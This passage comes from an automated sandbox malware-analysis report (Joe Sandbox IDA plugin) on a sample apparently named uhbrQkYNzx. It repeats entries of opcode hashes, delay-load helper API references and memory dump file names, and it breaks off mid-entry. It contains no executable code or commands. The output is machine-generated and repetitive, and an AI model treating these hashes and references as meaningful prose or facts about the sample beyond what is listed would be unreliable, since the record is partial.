• Opcode ID: 2fe3fc8d27646dbb3ac61b4573d76704118d6b0418ac474f8854d54339d45405
• Instruction ID: 4f26066799ffc170de5d07e060da393380f14803885ad556850c29bf01b34579
• Opcode Fuzzy Hash: 2fe3fc8d27646dbb3ac61b4573d76704118d6b0418ac474f8854d54339d45405
• Instruction Fuzzy Hash: 2FB012912DC3407C334451953F03D77414DC1C1F303308A1BF000C2143F4404D802032
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 07d547c2032e1e308f9129796c305224e634a1298eb3ccbec07d1feddd5ea906
• Instruction ID: 2748f17fbfc13e9cab6d740ee33c1b70c22a70b73c3380ea2d99adc2e1c7a860
• Opcode Fuzzy Hash: 07d547c2032e1e308f9129796c305224e634a1298eb3ccbec07d1feddd5ea906
• Instruction Fuzzy Hash: 48B012912DC2407C320451953F03D77414DC1C2F30330C91BF400C2143F4404D402132
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ad7c850fc6715a07f68e06dcba971c2def9666805a35cb05b56721e62bb31a57
• Instruction ID: a5f80e2d487f3fc6ce4b88aaa20004a06feface77a285fc82c64c316f4f610a1
• Opcode Fuzzy Hash: ad7c850fc6715a07f68e06dcba971c2def9666805a35cb05b56721e62bb31a57
• Instruction Fuzzy Hash: D0B012812DC2407C320851E53F03D77414DC1C0F30330CD1FF000C2243E4408C442032
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 766845500fd60f71610141c507c375ddb03d02019c6eddaa3e35142d1e8ca4fb
• Instruction ID: 6e25af6aef6614102777bbf15577013c607051fb807fb4a79a048746092de7fb
• Opcode Fuzzy Hash: 766845500fd60f71610141c507c375ddb03d02019c6eddaa3e35142d1e8ca4fb
• Instruction Fuzzy Hash: 14B012812DD2407C320451953F03D77414EC1C1F30331C92BF400C2183E4404C402132
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 46df162179798b1718ac9ff04048f996cf759496c459fc7cc155d187a6527878
• Instruction ID: b1cf60bf475fd526c50cd759ed1a2571551c12897a65a1412dc2b2706a5eeb4f
• Opcode Fuzzy Hash: 46df162179798b1718ac9ff04048f996cf759496c459fc7cc155d187a6527878
• Instruction Fuzzy Hash: 3DB012912DC2407C320451953F03D77414EC1C1F30330891BF400C2143F4414E422032
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 40b25889e5cb721e278a1bf44417e59e4febbd53a5d960842fa3420f915b82ff
• Instruction ID: 26b24b9d08bd1ff8ec58ce7f56e94fdf3ff9f1a58d71ae78efd5577cb8556be1
• Opcode Fuzzy Hash: 40b25889e5cb721e278a1bf44417e59e4febbd53a5d960842fa3420f915b82ff
• Instruction Fuzzy Hash: 95B012812ED2407C320451953F03D77418FC5C0F30331891FF000C2143E4404C402032
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: b1d8bbf77956426b64324ad8baf7ecd52af7208cef8a53e1122eaed1e36b8bd6
• Instruction ID: 4002369a9b3865b5d38c7bd988d50997ca1dd46cc50ad9294850332e371806db
• Opcode Fuzzy Hash: b1d8bbf77956426b64324ad8baf7ecd52af7208cef8a53e1122eaed1e36b8bd6
• Instruction Fuzzy Hash: 17B012912DD3407C334452953F03D7B414EC1C0F303318A1BF000C2143E4404C802032
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 114e797129f1c4589826b9048e4786bac994c604d52c58395aa064581a641203
                                                              • Instruction ID: d386bb07f3b90e2f5061fb30bc97cc526da583a3359d5b9edc783c092563cdfa
                                                              • Opcode Fuzzy Hash: 114e797129f1c4589826b9048e4786bac994c604d52c58395aa064581a641203
                                                              • Instruction Fuzzy Hash: 6EB012822DC250BC314451CA1F03E7B414DC0C0B35330D51BF500C3247E4405C402132
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: bac5307ef1521f0d0572f651c65d9fcd09347ebc409583ad99799f9a988f3884
                                                              • Instruction ID: 12a3813c82114036d63e270268d8aeaf1de44c8158b502d187be3a535c7e35b8
                                                              • Opcode Fuzzy Hash: bac5307ef1521f0d0572f651c65d9fcd09347ebc409583ad99799f9a988f3884
                                                              • Instruction Fuzzy Hash: EAB012822DC2507C3204A18A5F03E7B414DC0C0B35330971BF100C3187E4404C842032
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 903ed193295733019083d8eba60c8b644cbe4d2f91f4e52f25af619f4e510984
                                                              • Instruction ID: d15f0b524a1fd01d00280196020a8ab9d06ccc5c7cd94a2d31abf3241c5d69b8
                                                              • Opcode Fuzzy Hash: 903ed193295733019083d8eba60c8b644cbe4d2f91f4e52f25af619f4e510984
                                                              • Instruction Fuzzy Hash: FDB012822DC1507C3104618A5F03E7B414DC0C0B35330D71BF200C3147E4404C422032
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
